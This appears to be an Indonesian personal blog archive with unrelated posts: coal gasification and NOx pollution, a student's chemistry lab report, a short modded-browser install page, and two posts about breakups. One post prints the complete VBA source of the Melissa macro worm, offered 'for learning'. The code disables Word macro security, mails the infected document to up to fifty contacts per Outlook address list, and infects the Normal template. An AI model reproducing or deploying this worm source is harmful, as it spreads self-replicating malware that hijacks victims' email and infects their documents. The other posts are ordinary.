Coal gasification adalah sebuah proses untuk merubah batubara padat menjadi gas batubara yang mudah terbakar (combustible gases), setelah proses pemurnian gas-gas ini karbon monoksida (CO), karbon dioksida (CO2), hidrogen (H), metan (CH4), dan nitrogen (N2) - dapat digunakan sebagai bahan bakar. hanya menggunakan udara dan uap air sebagai reacting-gas kemudian menghasilkan water gas atau coal gas, gasifikasi secara nyata mempunyai tingkat emisi udara, kotoran padat dan limbah terendah.

Tetapi, batubara bukanlah bahan bakar yang sempurna. Terikat didalamnya adalah sulfur dan nitrogen, bila batubara ini terbakar kotoran-kotoran ini akan dilepaskan ke udara, bila mengapung di udara zat kimia ini dapat menggabung dengan uap air (seperti contoh kabut) dan tetesan yang jatuh ke tanah seburuk bentuk asam sulfurik dan nitrit, disebut sebagai "hujan asam" “acid rain”. Disini juga ada noda mineral kecil, termasuk kotoran yang umum tercampur dengan batubara, partikel kecil ini tidak terbakar dan membuat debu yang tertinggal di coal combustor, beberapa partikel kecil ini juga tertangkap di putaran combustion gases bersama dengan uap air, dari asap yang keluar dari cerobong beberapa partikel kecil ini adalah sangat kecil setara dengan rambut manusia



Dampak terhadap Lingkungan & salah satu cara meminimalisirnya

Nitrogen secara umum adalah bagian yang besar dari pada udara yang dihirup, pada kenyataannya 80% dari udara adalah nitrogen, secara normal atom-atom nitrogen mengambang terikat satu sama lainnya seperti pasangan kimia, tetapi ketika udara dipanaskan seperti pada nyala api boiler (3000 F=1648 C), atom nitrogen ini terpecah dan terikat dengan oksigen, bentuk ini sebagai nitrogen oksida atau kadang kala itu disebut sebagai NOx. NOx juga dapat dibentuk dari atom nitrogen yang terjebak didalam batubara.

Di udara, NOx adalah polutan yang dapat menyebabkan kabut coklat yang kabur yang kadang kala terlihat di seputar kota besar, juga sebagai polusi yang membentuk “acid rain” (hujan asam), dan dapat membantu terbentuknya sesuatu yang disebut “ground level ozone”, tipe lain dari pada polusi yang dapat membuat kotornya udara.

Salah satu cara terbaik untuk mengurangi NOx adalah menghindari dari bentukan asalnya, beberapa cara telah ditemukan untuk membakar barubara di pemabakar dimana ada lebih banyak bahan bakar dari pada udara di ruang pembakaran yang terpanas. Di bawah kondisi ini kebanyakan oksigen terkombinasikan dengan bahan bakar daripada dengan nitrogen. Campuran pembakaran kemudian dikirim ke ruang pembakaran yang kedua dimana terdapat proses yang mirip berulang-ulang sampai semua bahan bakar habis terbakar. Konsep ini disebut "staged combustion" karena batubara dibakar secara bertahap. Kadang disebut juga sebagai "low-NOx burners" dan telah dikembangkan sehingga dapat mengurangi kangdungan Nox yang terlepas di uadara lebih dari separuh. Ada juga teknologi baru yang bekerja seperti "scubbers" yang membersihkan NOX dari flue gases (asap) dari boiler batubara. Beberapa dari alat ini menggunakan bahan kimia khusus yang disebut katalis yang mengurai bagian NOx menjadi gas yang tidak berpolusi, walaupun alat ini lebih mahal dari "low-NOx burners," namun dapat menekan lebih dari 90% polusi Nox.

Kamis

Praktikum "Perubahan Materi"

Fiuuh... Akhirnya!
Hari ini kelompok praktikum kimia saya, kelompok XI, yang terdiri dari Dwi Maihut (saya sendiri), Abu Hapas, Deni Susanto, Efrianto, & Yulia Nababan (tidak hadir saat praktikum tadi) baru aja merampungkan 2 percobaan tentang Perubahan Materi. Horeeeeee!!!!!:-) hahahaha
Seandainya kalian tau, semalaman saya tidur-bangun-tidur-bangun, nyelesaiin laporan awal praktikum. laporan awal itu sendiri baru kelar sekitar jam 8an pagi tadi... Kenapa laporan awal ini begitu penting? ealah, tanpa itu saya mana boleh masuk labor!:-)
Selama kegiatan praktikum, saya yang kebagian mencatat tiap reaksi yang ditimbulkan dari hasil percobaan benar-benar membutuhkan konsentrasi & fokus total, sebab jika salah mencampurkan zat bisa-bisa jadi tragedi bom bunuh diri..:-)




Oke, ini dia percobaan yang kelompok kami lakukan di kampus tadi :

Percobaan 1.1:

 Memanaskan beberapa potong lilin ke dlm tabung reaksi dgn penangas air, kemudian saat potongan2 lilin berubah, diangkat dan dicelupkan tabung reaksinya ke dlm air dingin. Yang terjadi : Selama 2 menit dipanaskan lilin mencair, cairan berwarna bening.

 Memasukkan 1 sendok NaCl ke dlm gelas kimia yg telah diisi air, kemudian diaduk. Yang terjadi : Saat dicampurkan air, cairan berwarna bening, kemudian saat dipanaskan selama 1 menit terdapat titik2 embun/uap pada tutup atas cawan petri. Semakin lama pemanasan semakin banyak dan cepat terbentuk titik embun/uapnya. Kemudian saat didinginkan, uap/titik embun tadi kembali menjadi cair (air) seperti semula, namun NaCl-nya telah melebur bersama air.






Percobaan 2.2:

 Menambahkan 3 mL larutan kalium iodida 0,1 M ke dalam tabung reaksi yang berisi 2 mL larutan timbal (II) nitrat 0,1 M. Yang terjadi : Setelah dicampurkan, terjadi perubahan warna. Pada awalnya kalium iodida berwarna kuning cerah dan timbal (II) nitrat berwarna putih bening. Setelah dicampur, membentuk warna kuning pekat dan terdapat pengendapan.

 Menambahkan beberapa tetes larutan asam klorida 1 M (memakai pipet tetes) ke dalam tabung reaksi yang berisi 1 mL larutan kalium kromat 0,1 M. Yang terjadi: Pada awalnya larutan asam klorida berwarna putih bening dan larutan kalium kromat berwarna kuning. Setelah dicampur, membentuk warna kuning terang. Suhu tetap.

 Memasukkan sebutir kecil batu pualam ke dalam tabung reaksi yang berisi 2 mL larutan asam klorida 1 M. Yang terjadi: Batu pualam mengeluarkan buih (seperti soda) dan kemudian melebur. Warna cairan putih, suhu hangat, dan terdapat pengendapan.

 Menambahkan beberapa tetes larutan natrium hidroksida 1 M (memakai pipet tetes) ke dalam tabung reaksi berisi 2 mL larutan amonium klorida 1 M. Kemudian mengibaskan udara di atas tabung reaksi ke arah hidung. Yang terjadi : Setelah dicampur, warna cairan tetap bening, namun cairan mengeluarkan bau seperti bau pesing.

 Tabung reaksi 2 buah diisi masing-masing 3 mL larutan asam klorida 1 M. Kemudian menggenggam kedua tabung reaksi dan merasakan suhu kedua larutan. Setelah selesai, kedua tabung berisi 3 mL larutan asam klorida 1 M tadi masing-masing ditambahkan larutan natrium hidroksida 1 M. Yang terjadi : Setelah mengalami pencampuran, suhu larutan menjadi hangat/panas.





TEORI DASAR :

Dari hasil praktikum kelompok kami, saya dapat menarik atau menyimpulkan teori dasar dari Perubahan Materi.
Materi adalah segala sesuatu yang mempunyai massa dan menempati ruang. Materi yang juga disebut sebagai zat atau benda, dapat diamati dengan panca indera, misalnya warna, wujud, kekerasan, rasa, bentuk, bau, kelarutan, korosif, dan terbakar.

Setiap materi akan berubah jika diberikan suatu perlakuan. Perlakuan ini akam menimbulkan perubahan terhadap materi. Perubahan ini ada yang bersifat sementasa dan tidak menghasilkan zat baru yang disebut perubahan fisika, dan yang bersifat tetap serta menghasilkan zat baru yang disebut perubahan kimia (reaksi kimia).

Pada perubahan fisika tidak terjadi perubahan komposisi zat dan sifat kimianya. Perubahan fisika lebih kita kenal sebagai perubahan wujud zat. Pada perubahan wujud zat, tidak ada zat baru yang terbentuk. Zat tersebut meski telah berubah wujudnya tetapi masih mempunyai rumus molekul kimia yang sama.
Sebab-sebab terjadi perubahan fisika: penerimaan panas oleh zat, pelepasan panas oleh zat, pencampuran zat tanpa membentuk zat baru, pemotongan atau pembelahan zat.

Macam-macam perubahan fisika :
 Mencair : perubahan wujud zat dari padat ke cair.
 Menguap : perubahan wujud zat dari cair ke gas.
 Menyublim : perubahan wujud zat dari gas ke padat/sebaliknya.
 Mengembun : perubahan wujud zat dari gas ke cair.
 Membeku : perubahan wujud zat dari cair ke padat.

Sedangkan untuk perubahan kimia, ada yang berlangsung cepat dan ada yang berlangsung lambat. Kecepatan reaksi (perubahan) kimia dapat diketahui dengan mengukur sesuatu yang berubah terhadap waktu. Untuk suhu reaksi, semakin tinggi suhu, semakin cepat pula partikel pereaksi bergerak, akibatnya tumbukan antar partikel semakin sering sehingga mempercepat reaksi (perubahan) kimia.

Secara umum, makin besar konsentrasi pereaksi, makin cepat suatu reaksi berlangsung. Hal ini berkaitan dengan jarak antar partikel pada pereaksi. Makin besar konsentrasi pereaksi, maka jarak antar partikel pereaksi makin dekat. Semakin luas permukaan sentuh, makin cepat kecepatan reaksi. Selain itu, katalis berperan dalam mempengaruhi kecepatan reaksi (tetapi katalis tidak ikut bereaksi).

Perubahan kimia ditandai dengan:
 Perubahan warna.
 Perubahan suhu.
 Timbulnya endapan.
 Timbulnya gas.
 Perubahan bau.
 Perubahan pH.

Hooaaaaahaaaaeeeem...... Ngantuk nehh.. Dah dulu ya ngetiknya teman-teman/pembaca, mao tidur dulu, nebus utang..
Gud naigh(^_^)

Rabu

HALAMAN INSTALASI N-Surfing

TERIMA KASIH KEPADA TEMAN-TEMAN YANG SUDAH MENDOWNLOAD APLIKASI BROWSER N-Surfing HASIL MODIFAN SAYA. SETELAH INI TEKAN PILIHAN "ACCEPT" DAN BROWSER N-Surfing TELAH FULL TERINSTALL DAN SIAP DIGUNAKAN. OKE SEGITU AJA, SAYA TUNGGU TANGGAPAN, KOMENTAR, SARAN DAN KRITIK DARI TEMAN-TEMAN.. ^_^

Sabtu

Berteman dengan mantan pacar?

Putus hubungan dari sebuah hubungan yang bermakna dalam adalah suatu pengalaman yang menyakitkan. Namun, mengubah kisah percintaan dari kisah romantis menjadi hubungan yang platonik (cinta yang bersifat persaudaraan) hanya bisa menambah rasa sakit di hati. Betul bukan? :-)

Seseorang yang baru putus dari kekasihnya yang masih dicintainya pastilah tidak mau benar-benar putus hubungan. Meluncurlah kata-kata "kita jadi teman saja, ya?" dari sang mantan pacar. Kata-kata tersebut diucapkan oleh seseorang yang siap untuk keluar dari sebuah hubungan romantis kepada pihak yang belum ingin hubungan tersebut berakhir.

Apakah pertemanan merupakan jawaban yang terbaik? Biasanya kata-kata tersebut diucapkan untuk melunakkan kata-kata putus dan dimaksudkan untuk menolong pihak yang diputuskan agar tidak terlalu berkabung atas putusnya tali percintaan mereka. Namun, apakah pertemanan ini penting?

Kalo menurut Michael Vincent Miller, PhD, pengarang Intimate Terorism seh katanya berduka cita atau menangisi berakhirnya hubungan adalah faktor penting untuk penyembuhan sakit hati loh! Ini penting karena jatuh cinta membawa seseorang masuk ke dalam sebuah wilayah yang penuh resiko. Dua orang yang jatuh cinta menempatkan dirinya ke dalam tangan pasangannya. Karena hal inilah, ketika putus hubungan, muncul rasa pahit yang ditinggalkan dan merasa sendiri.

Bersedih adalah proses berjalan untuk mengeluarkan "saya" dari "kita". Ini memberikan sebuah jalan untuk kembali mengumpulkan kepercayaan diri untuk kembali mandiri. Meski persahabatan setelah putus bisa memberikan kelegaan sementara, namun hal ini bisa menghambat sebuah jalan penyembuhan untuk kembali sendiri. Saya sendiri ketika diputuskan oleh pacar saya kala itu, tidak dapat menerima keadaan status persahabatan yang tadinya adalah status kekasih. Dalam waktu yang cukup lama (bagi saya), si Dia dan saya tidak lagi berhubungan. Di situasi inilah kemudian yang membuat saya dapat menerima kenyataan dari hubungan kami meski sampai sekarang saya tetap mencintai dia, tapi paling tidak saya telah bisa mengontrol perasaan saya akibat membiasakan diri tidak berhubungan dengan dia, dengan kata lain ketika anda pada situasi tidak dapat menerima keadaan dari yang tadinya pacaran dan sekarang berteman, cobalah untuk membiasakan diri untuk tidak memikirkan dia dan menghubungi dia dalam jangka waktu yang lama sampai Anda merasa bisa mengatasi perasaan cinta Anda. Percayalah, walau berat tapi ini memberi pengaruh yang signifikan terhadap Anda.

Semua manusia, dalam perkembangannya pasti akan merasakan sebuah kehilangan, dan perlu ditangisi. Diberbagai tahapan kehidupan, kita semua terdorong di luar keinginan dan kenyamanan kita untuk masuk ke dalam situasi baru. Misalnya, langkah pertama bayi menandakan akan mulai keluarnya ia dari zona nyamannya saat digendong. Seorang dewasa muda yang baru masuk kuliah dan harus kost di dekat kampusnya mungkin merasa senang akan kebebasan barunya, namun ia juga harus bisa menghadapi homesickness. Untuk semua rasa sedih itu, ada hal-hal yang baik yang dipelajari dan didapat. Kesedihan bisa dikatakan adalah rasa sakit untuk pertumbuhan manusia.

Semua kisah cinta akan berakhir, meski ada juga kisah yang bertahan seumur hidup. Ketika rasa kehilangan melanda, maka akan sulit untuk menemukan jalan keluarnya, atau bahkan bagaimana menanggungnya.

Bersedih mengajarkan kita menerima akhir dari rasa cinta, dan membantu kita memulai proses untuk menjadi diri sendiri kita lagi. Memang benar, diri yang sudah mengalami kesedihan tak akan sama seperti kita ketika masih berada dalam hubungan. Meski luka bisa sembuh, namun tetap akan meninggalkan bekas. Tetapi banyak hal yang bisa kita raih dari sekadar berhasil melewati rasa sakit putus hubungan. Ada pula kemungkinan untuk menjadi seseorang yang lebih baik saat Anda masih bersamanya. Sama seperti seni dan skill, satu-satunya cara untuk mempelajarinya adalah melalui praktik, suka atau tidak.
Tetapi apapun itu, nikmatilah hidup selagi mungkin. Berdoalah kepada Tuhan agar Ia menguatkan hatimu:-)

Kamis

5 alasan konyol untuk putus

Ini merupakan analisis yang saya tulis berdasarkan pengalaman yang saya alami. Pahitnya kata-kata putus yang saya terima dari pacar saya kala itu benar-benar membuat hidup saya berantakan untuk beberapa lama sebelum saya bangkit dari keterpurukan tersebut. Mengapa si Dia tiba-tiba memutuskan saya hanya dengan alasan "aku gak dibolehin pacaran oleh orang tuaku, pcrn itu hanya milik mereka yang sudah mau menikah." Parahnya beberapa bulan kemudian dia telah 2 kali ganti pacar sejak putus dengan saya.
Alasan2 konyol memang sering dikemukakan saat memutuskan hubungan dengan pasangan. Namun alasan sesungguhnya dibalik alasan tersebut seringkali tidak terungkap, atau, samasekali berbeda dengan yang dilontarkan.
Berikut ini 5 alasan konyol yg dilontarkan untuk memutuskan hubungan :

Alasan no 1 : "Saya mencintaimu, tetapi saya enggak jatuh cinta padamu."
Artinya : "Saya enggak tertarik denganmu lg. Dulu saya memang tertarik padamu, tetapi perasaan itu sudah lama hilang." Ini memang kalimat klasik yg dipakai kaum pria ketika hubungan sudah terlalu lama. Namun pada perjalanannya, wanita sekarang juga memakai jurus ini pada pasangannya.

Alasan no 2 : "Bukan kamu yg salah, aku yang salah!"
Artinya : Sekali lagi, "Saya enggak tertarik denganmu lagi."
Apakah anda melihat polanya disini? Suatu hubungan diawali oleh rasa tertarik. Bila hal tersebut sudah tak ada lagi, tak ada yang perlu dipertahankan lagi. Dengan berinisiatif mengakui "kesalahan" tersebut, si Dia tak perlu banyak berdebat, dan lebih mudah menarik diri dari hubungan.

Alasan no 3 : "Saya terlalu sibuk untuk berpacaran saat ini."
Artinya : "Hubungan ini lebih banyak menimbulkan masalah, dan saya lebih baik menjauh darimu."
Tidak ada hubungan yang sempurna ; selalu ada hal-hal yang baik dan buruk. Yang membedakannya adalah, berapa rasio baik dan buruk ini? Bila yang buruk lebih banyak, itu saatnya memutuskan hubungan.

Alasan no 4: "Saya jatuh cinta terlalu dalam denganmu, dan saya takut!"
Artinya : Si Dia menganggap pasangannya terlalu menuntut, dan tidak memberinya ruang untuk bernafas. Karena itu, lebih baik bila ia segera keluar dari hubungan tersebut. Mempertahankan hubungan hanya membuat si Dia merasa sakit kepala.

Alasan no 5: "Kamu pantas mendapatkan wanita/pria yang lebih baik." atau "Kamu terlalu baik buatku."
Artinya : "Saya ingin mencari wanita/pria lain, yang tidak seperti kamu."
Boleh dibilang ini alasan yang paling konyol. Punya pacar yang baik kok malah dilepas?

Nah, bila salah satu alasan ini pernah digunakan pasangan kamu untuk menghindar dari kamu, sudahlah. Beri dia ruang yang diinginkannya, dan lanjutkan hidup kamu, sendiri ataupun bersama pria yang mau menerima apa adanya (^-^)

Selasa

Kode Script virus Melissa

Ini dia kode script virus Melissa, virus  yang pernah ngetrend beberapa tahun yang lalu, sekarang seh udah kalah pamor ama conficker.. hihihi..

O ya, virus ini dibuat menggunakan Visual Basic Script. Ini dia kodenya, tap ini cuma buat pembelajaran aja, buat yang laen-laennya gue gak nanggung..

Private Sub AutoOpen() 
On Error Resume Next 
  p$ = "clone" 
 
If System.PrivateProfileString("",     "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then 
  CommandBars("Macro").Controls("Security...").Enabled = False 
  System.PrivateProfileString("",   "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& 
Else 
 
p$ = "clone" 
CommandBars("Tools").Controls("Macro").Enabled = False 
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):    Options.SaveNormalPrompt = (1 - 1) 
End If 
 
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice 
  Set UngaDasOutlook = CreateObject("Outlook.Application") 
  Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") 
 
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?")  <> "... by Kwyjibo" Then 
 
   If UngaDasOutlook = "Outlook" Then 
      DasMapiName.Logon "profile", "password"
 
For y = 1 To DasMapiName.AddressLists.Count 
 
   Set AddyBook = DasMapiName.AddressLists(y) 
    x = 1 
   Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) 
 
For oo = 1 To AddyBook.AddressEntries.Count 
    Peep = AddyBook.AddressEntries(x) 
    BreakUmOffASlice.Recipients.Add Peep 
  x = x + 1 
If x > 50 Then oo = AddyBook.AddressEntries.Count 
 
Next oo 
    BreakUmOffASlice.Subject = "Important Message From " & Application.UserName 
  BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-) " 
   BreakUmOffASlice.Attachments.Add ActiveDocument.FullName 
  BreakUmOffASlice.Send 
 Peep = "" 
Next y 
 
DasMapiName.Logoff 
 
End If 
 
p$ = "clone" 
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" 
End If 
 
  Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) 
  Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) 
    NTCL = NTI1.CodeModule.CountOfLines 
    ADCL = ADI1.CodeModule.CountOfLines 
  BGN = 2 
 
If ADI1.Name <> "Melissa" Then 
 
  If ADCL > 0 Then _ 
   ADI1.CodeModule.DeleteLines 1, ADCL 
  Set ToInfect = ADI1 
   ADI1.Name = "Melissa" 
  DoAD = True 
End If
 
If NTI1.Name <> "Melissa" Then 
  If NTCL > 0 Then _ 
   NTI1.CodeModule.DeleteLines 1, NTCL 
   Set ToInfect = NTI1 
  NTI1.Name = "Melissa" 
  DoNT = True 
End If
 
If DoNT <> True And DoAD <> True Then GoTo CYA 
 
  If DoNT = True Then 
  Do While ADI1.CodeModule.Lines(1, 1) = "" 
    ADI1.CodeModule.DeleteLines 1 
 Loop 
 
   ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") 
 
 Do While ADI1.CodeModule.Lines(BGN, 1) <> "" 
  ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) 
  BGN = BGN + 1 
 Loop 
End If 
 
p$ = "clone" 
  If DoAD = True Then 
    Do While NTI1.CodeModule.Lines(1, 1) = "" 
     NTI1.CodeModule.DeleteLines 1 
    Loop 
 
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") 
 
Do While NTI1.CodeModule.Lines(BGN, 1) <> "" 
  ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) 
  BGN = BGN + 1 
Loop
 
End If 
CYA: 
 
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then 
  ActiveDocument.SaveAs FileName:=ActiveDocument.FullName 
   ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then 
    ActiveDocument.Saved = True: End If 
'WORD/Melissa written by Kwyjibo 
'Clone written by Duke/SMF 
'Works in both Word 2000 and Word 97 
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! 
 
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score,    plus fifty points for using all my letters. Game's over. I'm outta here." 
End Sub

 

Template by : Software and Symbian Mobile